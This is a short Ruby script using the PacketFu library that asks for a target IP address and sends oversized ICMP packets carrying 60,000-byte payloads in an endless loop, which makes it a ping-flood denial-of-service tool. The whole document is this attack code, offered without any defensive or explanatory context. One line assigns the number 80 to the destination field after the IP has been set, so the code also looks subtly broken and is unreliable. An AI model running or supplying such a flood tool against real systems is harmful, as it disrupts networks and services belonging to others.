#!/usr/bin/ruby

require "packetfu"

puts "Enter IP" 

ip = gets.chomp


pkt = PacketFu::ICMPPacket.new(:config => PacketFu::Utils.whoami?)

pkt.ip_daddr = ip

pkt.ip_dst = 80

pkt.payload = "A" * 60000

count = 0 

while true do

	pkt.to_w
	count += 1

	puts "Sent #{count} packets"

end

